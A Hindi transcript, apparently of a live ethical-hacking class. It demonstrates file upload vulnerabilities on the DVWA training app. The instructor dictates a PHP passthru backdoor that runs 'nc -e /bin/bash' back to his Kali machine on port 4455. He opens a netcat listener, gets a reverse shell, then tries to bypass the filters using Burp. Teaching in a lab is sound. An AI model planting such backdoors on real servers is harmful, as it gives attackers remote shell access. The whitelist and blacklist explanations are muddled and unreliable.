तो ये एक्चुअल में फाइल अपलोडेशन वल्नरेबिलिटी क्या है, इसको हम जानते हैं, समझते हैं एंड देन प्रैक्टिस करेंगे इसको। एंड इसके लिए मैं आप लोगों को वेबसाइट कल तक मैं प्रोवाइड करा दूंगा, ओके। क्योंकि हमारे पास कुछ वेबसाइट हैं बट मैंने अभी तक उसमें टेस्ट नहीं किया है, सो उसके लिए मेरे को एक बार पहले टेस्ट करना पड़ेगा ताकि आप लोग भी उसमें परफॉर्म सक्सेसफुली कर पाओ, ओके। सो सबसे पहले हम लोग जानते हैं कि अब आप इसको फाइल या शेल अपलोड कुछ भी कह सकते हो। कई के लोग इसको फाइल अपलोड बोलते हैं, जो बग हंटर्स रहते हैं, पेनिट्रेशन टेस्टर्स जो एथिकल वे में काम करते हैं, ओके। और जो लाइक ब्लैक अटैकर्स रहते हैं या थोड़े इलीगल एक्टिविटीज़ करते हैं, डिफेसमेंट वगैरह, तो वो इसको शेल अपलोड वल्नरेबिलिटी बोलते हैं। तो अब हम इसको जानते हैं कि एक्चुअल में ये है क्या एंड तो व्हाट इज फाइल अपलोडेशन वल्नरेबिलिटी। सो फाइल अपलोडेशन वल्नरेबिलिटी are when a web server allow users to upload file to its file system without sufficiently validating things like their name, type, content or size. So अब यहाँ पे ये कहना क्या चाहता है, देखो फाइल अपलोडेशन वल्नरेबिलिटी एक ऐसी वल्नरेबिलिटी है जिसमें वेब सर्वर, जैसे कि हमने देखा था कि एक वेबसाइट होती है, उसका एक वेब सर्वर होता है जहाँ पे वो वेबसाइट होस्ट हो रही होती है, तो वहाँ पे वो वेब सर्वर कोई भी काइंड ऑफ फाइल को अपलोड करने का मौका देता है बिना ही उस फाइल को वैलिडेट किए। अब उसमें उसको क्या क्या वैलिडेट करना पड़ता है, उसका नेम, उसका टाइप कि वो किस टाइप की फाइल है। जैसे कि आपको अगर इमेज फाइल बोला गया है तो इमेज टाइप ही आपको अपलोड करना है, कोई और आप अपलोड नहीं कर सकते हो। जैसे कि कोई अगर आप PHP फाइल अपलोड कर दी, कोई PDF फाइल अपलोड कर दी, कोई EXE फाइल अपलोड कर दी, ओके। देन यहाँ पे कंटेंट्स भी देखना पड़ता है, ठीक है। कंटेंट्स मैं बताता हूँ अभी कहाँ पे इस कंटेंट्स को क्या चीज़ को बोला जा रहा है, ठीक है, जब हम प्रैक्टिस करेंगे तो जस्ट वेट मिनट। और उसका साइज़, ठीक है, कि उसका साइज़ भी देखना पड़ता है कि लाइक जितना साइज़ तुमको वहाँ पे बोल रखा है, सपोज करो कि वहाँ पे तुमको बोल रखा है कि तुम यहाँ पे कितना कुछ ही जैसे कि 10 MB, 10 MB या 5 MB या 20-25 MB, जितना तुमको वहाँ पे बता रखा है सिर्फ तुम उतना ही अपलोड कर सकते हो, ना उससे ज़्यादा ना उससे कम। उससे कम का होगा तो चलेगा बट उससे ज़्यादा का होगा तो वहाँ पे थोड़ा वो तुमको अलाउ नहीं करेगा, ओके। बट यहाँ पे देखो इसके बारे में 2 पॉइंट्स में लिखा हूँ कि सिंपल टाइप ऑफ वल्नरेबिलिटी होती है, ये कह सकते हो कि सिंपल काइंड ऑफ वल्नरेबिलिटी है, इसमें कोई उतना लाइक आपको माथापच्ची करने की ज़रूरत नहीं है, इजी टू अंडरस्टैंड है, ओके। एंड ये यूज़र्स को अलाउ यूजर्स टू अपलोड एग्जीक्यूटेबल फाइल्स सच एज PHP। दैट मीन्स कि ये यूजर्स को अलाउ करता है कि आप इसमें कोई भी एग्जीक्यूटेबल फाइल को अपलोड कर सकते हो। एग्जीक्यूटेबल फाइल इन द सेंस कि आप उसमें जो कोड लिखा होगा वो एग्जीक्यूट करा सकते हो वेबसाइट्स के द्वारा, जैसे कि PHP, ओके। सो PHP एक ऐसी फाइल है जहाँ पे आप अपना मलिशियस कोड को राइट कर सकते हो, जिसमें हम लोग अभी देखेंगे कि कैसे सर्वर को कॉम्प्रोमाइज़ किया जाता है इससे, ओके। सो जस्ट वेट करते हैं यहाँ पे, क्या बात है सर्वर काम नहीं कर रहा है। ओके सो अभी प्रॉपरली स्टार्ट हो रहा है, ओके। सो जस्ट वेट करते हैं, तब तक हम लोग आगे देखते हैं। सो अभी हम यहाँ पे जानते हैं कि यहाँ पे कौन सा प्रोटोकॉल है जो इन सब फाइल्स को अपलोड करने के लिए हमको परमिशन देता है, ओके। लाइक विच प्रोटोकॉल टू यूज फॉर फाइल अपलोड, कि लाइक हम लोग कौन सा प्रोटोकॉल यूज करते हैं फाइल को अपलोड करने के लिए। तो यहाँ पे बेसिकली FTP आता है, जो कि बेसिकली इसका फुल फॉर्म है फाइल ट्रांसफर प्रोटोकॉल, okay. So FTP is a network protocol for transmitting files between computers over transmission control protocol, internet protocol connections. That means कि फाइल ट्रांसफर प्रोटोकॉल एक नेटवर्क का प्रोटोकॉल है जो आपको कह सकते हो फाइल्स को ट्रांसमिट करने के लिए यूज होता है। किनके द्वारा यूज किया जाता है, कंप्यूटर्स के द्वारा, ओके।
और ये टीसीपी आईपी की हेल्प से यहाँ पे काम करता है ये। ओके, सो एफटीपी को यहाँ पे जो फाइल अपलोड फंक्शंस यूज होते हैं, या कह सकते हो आप किसी भी वेबसाइट को अगर स्कैन करोगे वहाँ पे एफटीपी ओपन है, दैट मीन्स आप उसके क्लाइंट साइड से कहीं से कोई फाइल को अपलोड कर सकते हो सर्वर पे। ओके, देन हाउ टू एक्सप्लॉइट फाइल अपलोड वल्नरेबिलिटी। सो सब बहुत ईजी है। सबसे पहले जनरेट अ बैकडोर। ठीक है, कोई एक बैकडोर को जनरेट कर लो या खुद का बना लो। ठीक है, खुद का कोड बना लो। देन अपलोड जनरेटेड फाइल्स, जो आपने फाइल बनाई उसको जनरेट अपलोड कर दो एंड उससे कनेक्ट हो जाओ। ठीक है, कनेक्ट टू इट, दैट मीन उसको उससे कनेक्शन, रिवर्स कनेक्शन ले लो। फाइंड आउट हाउ टू यूज वीवली। अब दैट मीन्स कि यहाँ पे वीवली एक टूल है जो कि काली लिनक्स में। ओके, सो यहाँ पे बेसिकली विशाल आप क्या कर सकते हो कि आप काली लिनक्स को डुअल बूट में इंस्टॉल कर सकते हो। अगर आपको काली लिनक्स के साथ हैकिंग करनी है तो काली लिनक्स में बर्प सूट ऑलरेडी इंस्टॉल आता है, देन आप वहाँ पे बर्प सूट का भी यूज़ में ले सकते हो और यहाँ पे काली लिनक्स का भी यूज़ में ले सकते हो। तो ये आपके पास एक ऑप्शन है। ओके, वरना अगर आपको कह सकते हो कि ये सारी चीज़ परफॉर्म करनी है तो आपको एक वीपीएस खरीदना पड़ेगा। वीपीएस इन द सेंस के लाइक काली लिनक्स ही होता है, बस उसको टर्मिनल से आपको ऑपरेट करना रहेगा। आपके पास लाइक ऐसा जो यूज़र इंटरफेस रहता है यहाँ पे नहीं होगा। ओके, सो आपके पास ऐसा इंटरफेस नहीं रहेगा। बाकी आप उसमें टूल्स वगैरह, ये सारे टूल्स वगैरह इस्तेमाल कर सकते हो, जितने भी हैं सबको इंस्टॉल करके यूज़ में ले सकते हो। ठीक है, तो ऐसा कोई प्रॉब्लम का बात नहीं है। अगर आपको वीपीएस चाहिए तो वीपीएस थोड़े पेड आते हैं, तो अगर आपको चाहिए तो आपके लिए हम लोग मंगा सकते हैं, बस आपको उसके लिए एक्स्ट्रा पे करना पड़ेगा। ओके, क्योंकि जहाँ से हम लोग खरीदते हैं वहाँ पे भी हमको लाइक कह सकते हो हमारे क्रेडिट कार्ड से पेमेंट करनी पड़ती है। ओके, सो अगर आपके पास क्रेडिट कार्ड है देन हम आपको वेबसाइट दे सकते हैं, तो आप वहाँ से परचेज कर सकते हो। अदरवाइज आप हमको बता सकते हो, हम आपके लिए खरीद देंगे। ओके, हाँ, सो यहाँ पे तो हो गया फाइल अपलोडेशन वल्नरेबिलिटी। अभी हम इसको परफॉर्म करने के लिए बढ़ते हैं आगे। तो सक्सेसफुली हम एज यूजुअल हम लोग यहाँ पे ब्रेव ब्राउज़र ओपन कर लेते हैं प्रॉक्सी के साथ, क्योंकि हमको इसमें बर्प सूट का ज़रूरत पड़ने वाला है। तो यहाँ पे जस्ट वेट करो, यहाँ पे मैं 192.131 आई गेस। ओके, वेबसाइट ओपन कर लेते हैं एंड आईपी एड्रेस आई गेस 128.131 सही है हमारी आईपी एड्रेस। ओके, सो जस्ट वेट, इसको हम लोग टाइम देते हैं ओपन होने का। इंटरसेप्शन ऑन, ओके ऑन नहीं करना है हमको अभी। अब अगले बस से रिफ्रेश करते हैं, तो यहाँ पे हमारे पास मेटास्प्लोइटेबल 2 आ गया है। ओके, तो आप लोग इसमें भी प्रैक्टिस कर सकते हो, और बाकी अगर आपने नॉर्मल वो नॉर्मल वाला वो वास्प का ब्रोकन वेब एप्लीकेशन कर रखा है उसमें भी कर सकते हो। ओके, तो मैंने इसको इसलिए यूज़ किया क्योंकि इसमें कोई प्रॉब्लम देखने को नहीं मिलती, आपको उसमें प्रॉब्लम देखने को मिलेगी थोड़ी। ओके, सो आपको यहाँ पे आना है नॉर्मल DVWA पे एंड यहाँ पे लॉगिन हो जाना है एडमिन, और इसका पासवर्ड है पासवर्ड। यहाँ पे आप लॉगिन हो गए, तो यहाँ पे आपको एक अपलोड का सेक्शन मिलेगा। तो सबसे पहले हम लोग यहाँ पे DVWA की सिक्योरिटी को लो कर देते हैं, सबमिट कर देते हैं एंड यहाँ पे वापस से फाइल अपलोड कहाँ गया, ये रहा। तो अपलोड, अब यहाँ पे देख सकते हो आपकी कोई भी एक फाइल्स को आप लोग अपलोड कर सकते हो। ठीक है, यहाँ पे लाइक आप कोई भी फाइल को अपलोड करना चाहो तो यहाँ पे कर सकते हो एंड ऑल ओवर दिस थिंग्स। तो अब उससे पहले हम लोग जान लेते हैं कि अपना खुद का बैकडोर कैसे क्रिएट करना है किसी भी वेबसाइट को इससे हैक करने के लिए और रिवर्स शेल लेने के लिए। ओके, सो अगर आपको प्रोग्रामिंग की नॉलेज है देन यू कैन क्रिएट योर ओन बैकडोर्स। अगर आपको कोई भी प्रोग्रामिंग लैंग्वेज आती है, जैसे कि आपको PHP आती है, क्योंकि PHP को हम लोग यहाँ पे अपलोड करके एग्जीक्यूटेबल बना सकते हैं और एग्जीक्यूट करके उससे एक्सेस ले सकते हैं। तो अगर आपको आती है देन वेल एंड गुड, अगर नहीं आती है तो भी कोई प्रॉब्लम नहीं है। ओके, सो उसके लिए मैं आपको बताता हूँ करना क्या है। टर्मिनल खोलना है एंड जस्ट एक
ओके। सो यहाँ पे बेसिकली आपको करना क्या है कि यहाँ पे कोई भी अगर मैं सी डी शेल पे जाता हूँ तो यहाँ पे मेरे पास अल्फ़ा शेल ऑलरेडी है, बट इसके लिए हम लोग ये तो खुद पे खुद कोडेड है। हम खुद का एक रिवर्स शेल का सिंपल सा बैकडोर बनाएंगे जो हमको रिवर्स कनेक्शन ला के देगा सर्वर का। ओके, तो उसके लिए आपको कोई भी एक फाइल बना लेनी है, ठीक है। इसके लिए मैं backdoor डॉट पी एच पी बना लेता हूँ। backdoor डॉट पी एच पी के नाम से यहाँ पे देखो एक ये आ गई है। ओके, ls-la एंड इसके पास हमारे पास रीडेबल और राइटेबल परमिशन है, बट इसके पास एग्जीक्यूटेबल परमिशन नहीं है। सो इसको एग्जीक्यूटेबल परमिशन के लिए देने के लिए chmod प्लस x backdoor डॉट पी एच पी ये दे देना है ताकि ये एग्जीक्यूटेबल बन जाए, इसको हम एग्जीक्यूट करा सकें। यहाँ पे ls करते हैं तो अब देखो ये ग्रीन कलर में आ गया, दैट मीन्स कि अब इसको हम एग्जीक्यूट करा सकते हैं। तो इसको एडिट करने के लिए मैं यहाँ पे माउस पैड के साथ इसको ओपन कर लेता हूँ, backdoor डॉट पी एच पी। एंड अब यहाँ पे हम अपना कोड लिखना शुरू करते हैं। बहुत छोटा सा कोड है और बहुत इजी सा कोड है। ओके, सबसे पहले आपको ये एरो लगा देने हैं और ये 2 क्वेश्चन मार्क। अब यहाँ पे नीचे आ जाना है और यहाँ पे PHP लिख देना है क्योंकि हम लोग PHP में कोड करने वाले हैं। ओके, देन यहाँ पे हमको कोड क्या करना है वो हम देख लेते हैं। सो यहाँ पे कोड क्या करना है, बेसिकली एक हमको फंक्शन को यूज करना है जो कि PHP का फंक्शन है। सो अब वो PHP का कौन सा फंक्शन है, यहाँ पे कई सारे PHP के बैकडोर्स आते हैं। तो एक मिनट, जस्ट वेट अ मिनट। ओके, तो यहाँ पे अभी हम लोग एक हमारे पास पास थ्रू फंक्शन है एंड हमारे पास एक सिस्टम फंक्शन भी है। तो यहाँ पे हम लोग पास थ्रू फंक्शन के लिए यूज करेंगे। तो यहाँ पे भी हमको करना क्या है कि हम पास थ्रू फंक्शन की हेल्प से यहाँ पे हम लोग अपना जो भी है बैकडोर वो बनाने वाले हैं। जस्ट एक मिनट, कौन मैसेज कर रहा है? ओके, तो अब यहाँ पे हम लोग सिंपल सा एक नॉर्मल सा बैकडोर यूज करेंगे PHP के लिए। यहाँ पे नॉर्मल कह सकते हो एक हो यार ओके, तो सबसे पहले हम लोग एक नॉर्मल सा बनाएंगे जो कि पास थ्रू फंक्शन के लिए होता है। देन उसके बाद हम लोग एक थोड़ा एडवांस बनाएंगे जो कि थोड़ा जिसमें ज़्यादा कोडिंग का यूज़ होता है। ओके, पास थ्रू हमने पास थ्रू फंक्शन दिया एंड यहाँ पे इसके अंदर हमको पूरा मेन कोड लिखना रहता है। ओके, तो अब यहाँ पे कोड क्या लिखना है, nc-e/bin/bash, आप नॉर्मल sh भी लिख सकते हो जो कि बेसिकली एक ही है, बैश को बैश शेल के लिए ही होता है। एंड यहाँ पे आपको आईपी एड्रेस दे देना है अपने काली मशीन का। तो आपको नॉर्मल करना क्या है, अपने काली मशीन का आईपी एड्रेस ओपन करना है कॉन्फ़िग करके। एंड एज यू कैन सी कि मेरा WLAN 0 ये है, तो मैं इसको कॉपी करता हूँ। ओके, नॉर्मल वापस हम अपने माउस पैड पे जाते हैं एंड यहाँ पे हम अपना आईपी एड्रेस पेस्ट करते हैं एंड यहाँ पे हम पोर्ट दे देते हैं जिसके मैं 4455 दे देता हूँ। या सिंपल एज दैट, हमारा बैकडोर बन के सक्सेसफुली कंप्लीट हो चुका है। अब हम समझते हैं हमारे बैकडोर को, हमारा बैकडोर कहना क्या चाहता है। यहाँ पे PHP में बनाया है, दैट्स हमने ये और ये नेसेसरी कोड है PHP का। ये एक सिंटैक्स है PHP का, जैसे कि HTML का सिंटैक्स है, PHP का C, हर प्रोग्रामिंग लैंग्वेज का अपना अलग अलग सिंटैक्स रहता है। तो यहाँ पे ये PHP का सिंटैक्स है। ओके, एंड यहाँ पे नॉर्मल पास थ्रू फंक्शन यूज़ किया गया है। पास थ्रू फंक्शन क्यों यूज़ में लेते हैं, ताकि हम कोई भी सिस्टम के कमांड को एग्जीक्यूट करा सकें। ठीक है, एंड हम क्या कमांड एग्जीक्यूट कराना चाहते हैं, ये कमांड एग्जीक्यूट कराना चाहते हैं। जस्ट सिंपल से हो गया है। फाइल को हम लोग सेव कर देंगे, सेव हो चुकी है। एग्जिट करते हैं, हमारे इस डायरेक्टरी पे है एंड जस्ट यहाँ पे हम जाते हैं, यहाँ पे हम चूज फाइल एंड यहाँ पे आप लोग देख सकते हो कि नॉर्मल यहाँ पे लो सेटिंग्स है। तो लो सेटिंग्स में कोई भी फाइल आप अपलोड कर सकते हो। सबसे पहले हम लोग एक हैकर की अपलोड करने का ट्राई करते हैं, एक नॉर्मल पिक जो कि hacker.jpg है। सेलेक्ट अपलोड, योर इमेज वॉज नॉट अपलोडेड, क्या बात है इसमें। ओके, सो अब यहाँ पे ओके मैं एक चीज़ और बता देता हूँ। यहाँ पे आप लोग फाइल अपलोडेशन फंक्शन जब आप लोग अपलोड करते हो तो वहाँ पे आपको क्या क्या चीज़ें ध्यान रखनी पड़ती हैं।
फाइल अपलोडेशन फंक्शन पे यहाँ पे वाइट लिस्ट और ब्लैक लिस्ट नाम की भी एक चीज़ होती है जो कि सिक्योरिटी के लिए इम्प्लीमेंट करी जाती है। तो ये एक्चुअल में वाइट लिस्ट ब्लैक लिस्ट है क्या, इसको हम समझते हैं। ओके, सो जस्ट एक मिनट। ओके, सो यहाँ पे वाइट लिस्ट क्या है एंड ब्लैक लिस्ट क्या है वो समझते हैं। आप देखिए बेसिकली ब्लैक लिस्ट क्या है। ब्लैक लिस्ट कि लाइक कोई भी चीज़ को आपको, जैसे कि यहाँ पे हमको मेंशन कर रखा है कि यहाँ पे आप कोई पर्टिकुलर काइंड ऑफ फाइल ही अपलोड कर सकते हैं। ओके, तो यहाँ पे हमको क्या अपलोड करना है, हम व्यू सोर्स देखते हैं। तो यहाँ पे हमको बता रखा है हैकेबल अपलोड्स में यहाँ पे चीज़ें अपलोड होगी, ठीक है। एंड यहाँ पे अपलोडेड टेम्प नेम टारगेट पाथ अपलोडेड नेम। सो यहाँ पे हमको ऐसा कुछ तो मेंशन कर नहीं रखा कि योर इमेज वाज नॉट अपलोडेड। सो यहाँ पे दैट मीन्स हमको यहाँ पे मैसेज दिखा रहा है कि योर इमेज वाज नॉट अपलोडेड। दैट मीन्स यहाँ पे हमको कोई इमेज को अपलोड करना है। तो इतना तो हमें मालूम चल गया। बट यहाँ पे ये है, यहाँ पे ब्लैक लिस्ट में सिक्योरिटी क्या होगी, ब्लैक लिस्ट इन द सेंस कि यहाँ पे सिर्फ इमेज अपलोड हो सकती और कोई फाइल अपलोड नहीं हो सकती, ठीक है। तो ये है ब्लैक लिस्ट, इसको फाइल को सर्वर को हैक होने से बचाने के लिए ये इम्प्लीमेंट कर रखा है। अब वाइट लिस्ट को समझते हैं। वाइट लिस्ट भी किसी पर्टिकुलर फाइल टाइप में ही इम्प्लीमेंट होती है। जैसे कि वाइट लिस्ट यहाँ पे क्या है कि यहाँ पे आपने देखा कि यहाँ पे बोला जा रहा है कि कोई इमेज को हम लोग अपलोड कर सकते हैं, बट हमें ये नहीं मालूम कौन सी टाइप की इमेज को अपलोड कर सकते हैं। तो यहाँ पे कोई एक टाइप की ही इमेज अपलोड होगी। जैसे कि यहाँ पे मैंने डॉट पीएनजी या जेपीजी अपलोड करने का ट्राई किया था। जैसे कि अगर मैं यहाँ पे शेल पे जाता हूँ, अल्फा शेल, तो यहाँ पे हैकर डॉट जेपीजी ये फाइल है। तो दैट मीन्स कि यहाँ पे जेपीजी फाइल को अपलोड नहीं कर सकते, कोई पर्टिकुलर काइंड ऑफ फाइल एक्सटेंशन को अपलोड कर सकते हैं। ये है वाइट लिस्ट। ओके, अब ब्लैक लिस्ट में आप लोग फाइल अपलोड कर सकते हो कोई भी टाइप की, लेकिन बस फाइल अपलोड होनी चाहिए और कोई फाइल नहीं, इमेज फाइल ही बस अपलोड होगी। तो यहाँ पे सबसे पहले हमको देखना पड़ेगा कि कौन सी फाइल यहाँ पे अपलोड हो रही है। तो उसके लिए हम लोग यहाँ पे ब्रूट फोर्स मेथड यूज करेंगे पता करने के लिए। इंटरसेप्ट ऑन करते हैं एंड चूज फाइल एंड यहाँ पे हम कोई भी a2.jpg इसको ओपन कर लेते हैं, यहाँ पे अपलोड हो गया। सो अब यहाँ पे हम अपलोड करने से पहले इंटरसेप्शन ऑन कर लेते हैं, अपलोड पे क्लिक करते हैं एंड देन यहाँ पे हमारे पास ये आ गया फाइल नेम a2.jpg। इसको हम राइट क्लिक इंट्रूडर में डालते हैं एंड यहाँ पे हमारे इंट्रूडर में चला गया। इंट्रूडर बेसिकली ब्रूट फोर्स करने के लिए काम आता है। ओके, एंड रिपीटर किसी मल्टीपल रिक्वेस्ट, किसी एक रिक्वेस्ट में चेंज करके आपको बार बार उसको सेंड करके देखना है क्या रिस्पॉन्स आ रहा है, तो उसके लिए रिपीटर है। ओके, तो इंट्रूडर पे गए एंड यहाँ पे हम लोगों ने हम सब क्लियर कर देते हैं और यहाँ पे जेपीजी को यहाँ पे हाईलाइट कर लेते हैं, ऐड कर लेते हैं। पेलोड पे जाते हैं, यहाँ पे हम जेपीजी तो दे रखा है, पीएनजी ऐड कर देते हैं, जेपीईजी ऐड कर देते हैं, जीआईएफ ऐड कर देते हैं। और कुछ होते हैं क्या, आईसीओ आइकॉन के लिए, और कौन कौन से आप लोग बताओ और कौन कौन से फाइल हो सकती हैं जो लाइक इमेज में आती हैं। पीएनजी, जेपीईजी, जेपीजी और जीआईएफ, फिर आइकॉन हम सर्च कर लेते हैं कि यहाँ पे हम ऑल टाइप ऑफ इमेज फाइल एक्सटेंशन, जेपीजी, पीएनजी, टिफ, पीएसडी, पीडीएफ, एआई। ओके, नहीं, पोर्टेबल डॉक्यूमेंट नहीं, टिफ, टैग्ड इमेज फाइल टिफ हो सकता है। बाकी और तो यहाँ पे यही सारे हैं। रॉ, डॉट रॉ को भी ऐड कर सकते हैं। तो बाकी तो नॉर्मल इतना ही है। हम रॉ, टिफ इनको ऐड कर लेते हैं एंड स्टार्ट अटैक पे क्लिक करते हैं। ओके, तो यहाँ पे सब में तो एक ही कंटेंट लेंथ आई है। दैट मीन्स यहाँ पे किसी में भी फाइल अपलोड नहीं हुई है। रिस्पॉन्स में अगर हम देखें तो फाइल इंक्लूजन, vulnerability, file upload, choose an image to, your image was not uploaded। ओके, सो यहाँ पे हमको देखना है कि फॉर्म
मैक्स फाइल साइज तो हमको यहाँ पे देखना है कि बेसिकली यहाँ पे कौन सी फाइल अपलोड हो रही है। ओके, प्रॉक्सी। सो अब यहाँ पे बेसिकली पहले क्या होता था, यहाँ पे जो सिस्टम्स पे लो सेटिंग्स रहती थी, तो यहाँ पे नॉर्मली आप लोग कोई भी फाइल अपलोड कर देते थे तो नॉर्मली अपलोड हो जाती थी। बट अभी पता नहीं इसमें आई गेस कोई चेंजेस किए गए हैं या आई डोंट नो। जैसा पुराना वर्जन जिसके के पास हो तो आप लोग उसमें ट्राई करना, तो उसमें हो जाएगा ईजिली। तो यहाँ पे अगर मैं होम शेल बैकडोर इसको भी अपलोड करना चाहूँ तो ओके, तो यहाँ पे देखो PHP फाइल लोएस्ट वाले में, यहाँ पे लो वाले पे अपलोड हो गई है। ओके, सो दैट मीन्स कि अब इसको हम लोकेट करते हैं, कॉपी यहाँ पे पेस्ट कर देते हैं, हिट एंड। दैट मीन्स कि यहाँ पे कोई एरर हमको देखने को नहीं मिला, दैट मीन्स कि यहाँ पे सक्सेसफुली अपलोड हो गई है। तब हम करते क्या है कि हम एक रिवर्स कनेक्शन के लिए यहाँ पे पोर्टल खोलते हैं। पोर्टल इन द सेंस कि हम लोग नेटकैट का हमने वहाँ पे कमांड दिया था, तो नेटकैट के लिए हम लोग यहाँ पे पोर्टल खोलेंगे ताकि हम कनेक्शन को रिसीव कर सकें। ओके, तो आपको ये कमांड दे देनी है NC-NLVP एंड 4455 जो आपने पोर्ट उसमें मेंशन किया था, एंड हिट एंटर। एंड वापस से हम अपने बैकग्राउंड के पास जाते हैं और यहाँ पे रिफ्रेश करते हैं एंड जाके हम देखते हैं तो यहाँ पे देखो कनेक्शन हमारे पास सक्सेसफुली यहाँ पे आ गया है। तो हम यहाँ पे सक्सेसफुली कनेक्ट हो चुके हैं यहाँ पे। ओके, लाइक हम लोग यहाँ पे सक्सेसफुली कनेक्ट हो चुके हैं हमारे टारगेट मशीन से। अगर मैं LS कर दूँ तो यहाँ पे देखो dbwa image.png, दैट मीन्स PNG फाइल यहाँ पे हम लोग अपलोड कर सकते हैं क्योंकि PNG एक पहले से ही अपलोडेड है, तो यहाँ पे हम लोग PNG कर सकते हैं। ओके, सो यहाँ पे एक backdoor.php जो हमारा वो है, सो अगर हम cat backdoor.php करते हैं तो यहाँ पे देखो यही हमारा जो कमांड हमने शेल अपलोड किया था उसी का ही कमांड है। सो हम कंट्रोल सी करके कमांड को इसको जाने देते हैं अभी के लिए। ओके, सो अभी हमको मालूम चल गया। अभी हम यहाँ पे जाते हैं DBA सिक्योरिटी में, इसको मीडियम कर देते हैं, सबमिट कर देते हैं, अपलोड पे गए। वापस हम वही अपना बैकडोर को अपलोड करने का ट्राई करते हैं, शेल बैकडोर। अब यहाँ पे हम अपलोड करते हैं तो यहाँ पे देखो योर इमेज वॉज नॉट अपलोडेड एंड समथिंग सम सॉर्ट ऑफ एरर यहाँ पे हमको देखने को मिल गया। तो अब इसके यहाँ पे कह सकते हो कि हम करने क्या वाले हैं कि यहाँ पे रिक्वेस्ट में चेंज करने वाले हैं। ठीक है, रिक्वेस्ट में मैनिपुलेट करने वाले हैं कि पहले हम कोई एक PNG का इमेज डालेंगे। ठीक है, यहाँ पे जैसे कि hacker.jpg है तो इसको हम ओके, सो यहाँ पे हम CD अल्फा शेल LS hacker.png है यहाँ पे, सो हम इसको रीनेम कर देते हैं hacker.png से LS करते हैं तो hacker.png हो गया ये। वापस हम लोग अपने उसे डायरेक्टरी पे आ गए। तो अब अगर हम यहाँ पे इसको एक बार बैक जाके अल्फा शेल पे आते हैं तो hacker.png हो गया ये। तो अब अगर हम इस बार करते क्या है कि होम हमारा शेल अल्फा शेल hacker.png, सो यहाँ पे अगर हम इसको अपलोड करने का ट्राई करते हैं तो भी यहाँ पे अपलोड नहीं हो रहा है, दैट मीन्स यहाँ पे कोई सम सॉर्ट ऑफ फाइल है। सो हम करते क्या है कि यहाँ पे PNG फाइल अपलोडेड है, सो हम करते क्या है कि यहाँ पे नहीं, ये नहीं, हमारा बग सूट का है, लेकिन इससे पहले हम लोग यहाँ पे अपना backdoor.php सेलेक्ट कर लेते हैं एंड इंटरसेप्ट को ऑन करते हैं एंड अपलोड पे क्लिक करते हैं। एंड यहाँ पे आप लोग देख रहे हो backdoor.php जो है, इसके आगे अगर हम कोई और एक्सटेंशन लगा दें PNG या समथिंग कोई भी PNG, एक बार ट्राई कर लेते हैं .png। ओके, फॉरवर्ड, तो भी यहाँ पे अपलोड नहीं हुआ, देख सकते हो। सो वापस अब हम करेंगे क्या कि यहाँ पे चूज फाइल a2.jpg फाइल भी यहाँ पे अपलोड नहीं हो रही। सो यहाँ पे हम करेंगे क्या कि A2 की जगह पे अब हम कर दे क्या देंगे, यहाँ पे हम लिख देंगे backdoor.php। फॉरवर्ड करते हैं, door.php। ओके, सो अभी भी यहाँ पे कुछ अपलोड नहीं हुआ है।
सो जस्ट वेट करो, लो मीडियम सेटिंग्स। अब यहाँ पे हमारे पास क्या ऑप्शन बचता है, यहाँ पे हम वापस इसको ओपन करते हैं एंड जस्ट यहाँ पे हम चूज फाइल backdoor.png। अब हम यहाँ पे इसके कंटेंट टाइप को अब्यूज करेंगे। ओके, अपलोड पे क्लिक किया तो यहाँ पे आपको दिख रहा होगा एक कंटेंट टाइप। सो हम इसके कंटेंट टाइप को हम लोग अब्यूज करने वाले हैं। यहाँ पे हम लोग लिख देंगे बेसिकली इमेज, इमेज, और इसकी जगह पे हम लोग लिख देंगे कुछ भी, समथिंग png या जो भी ये फाइल फॉर्मेट सपोर्ट करता हो। ओके, फॉर्मेट तो भी यहाँ पे ये नहीं हो रहा है। एक्चुअल में इसको हमको मालूम करना पड़ेगा कि एक्चुअल में ये कौन सा फाइल टाइप सपोर्ट कर रहा है, क्योंकि हमने सारी तो ट्राई कर ली बट स्टिल ये अपलोड नहीं हो रहा है। सो कौन सा JPEG आई गेस सपोर्ट कर ले। JPEG का हम लोग ट्राई करते हैं, कॉपी JPEG, चूज फाइल होम, स्नैप नहीं, स्नैप नहीं, शेल, अल्फा शेल, hacker.jpg। तो यहाँ पे ये फाइल भी अपलोड नहीं हुई। तो यहाँ पे हमको और भी कोई फाइल टाइप जो कि अपलोड हो सके, इसके हमको सोर्स कोड में भी देखने को नहीं मिल रहा है। यहाँ पे हम देखते हैं कि कौन सा फाइल फॉर्मेट। अनदर थिंग्स वर्थ लुकिंग आर रिस्ट्रिक्शन विद हिडन फील्ड, इंडेक्स अनरिस्ट्रिक्टेड फाइल अपलोड नहीं, वास्प यहाँ पे हमको कुछ बता नहीं रखा है। व्यू सोर्स, तो यहाँ पे फाइल का कोई टाइप बता रखा है। ओके, अपलोडेड। सो यहाँ पे इमेज स्लैश JPEG फाइल को यहाँ पे मेंशन कर रखा है एंड अपलोड साइज है इफ मूव अपलोडेड फाइल अपलोडेड टेम्परेरी टाइम पाथ। ओके, तो सक्सेसफुली अपलोडेड। इफ अपलोडेड फाइल अपलोडेड टेम्प नेम। सो एक बार हम लोग ट्राई करते हैं वापस से JPEG फाइल फॉर्मेट में, ये कर लिया एंड जस्ट इसकी जगह पे हम करेंगे क्या, ये करके जस्ट वेट, हमको इसी की जगह पे कॉपी, यहाँ पे हमको यहाँ पे जस्ट cd डॉट डॉट, यहाँ पे हम लोग एक बार बैकडोर को cp कमांड, ये cp कमांड कॉपी पेस्ट करने के काम आता है, स्लैश अल्फा शेल। अरे सॉरी, इसको पहले लिखना है। हिडन टैब, ओके हो गया। CD अल्फा शेल LS, तो बैकडोर यहाँ पे आ गया हमारा। इंटरसेप्ट ऑन है एंड अपलोड। हाँ, ओके ओके। सो यहाँ पे hacker.jpg, JPEG को हम backdoor डॉट PHP फॉर्मेट। ओके, अभी भी ये यहाँ पे नहीं हुआ। सो आप लोग ये मेथड ट्राई करना, या आप लोगों के उसमें काम कर जाना चाहिए, क्योंकि आई गेस इसको अपडेट किया गया है मशीन को या समथिंग कुछ, तो इसका तो अभी लाइक कुछ मालूम नहीं चल रहा है कि एक्चुअल में क्या काम है इसका। व्यू हेल्प रेफरेंस चेक करते हैं, मशीन को अपडेट किया गया है क्या। ओके, सो यहाँ पे एक खुलेगा नहीं वेबसाइट।
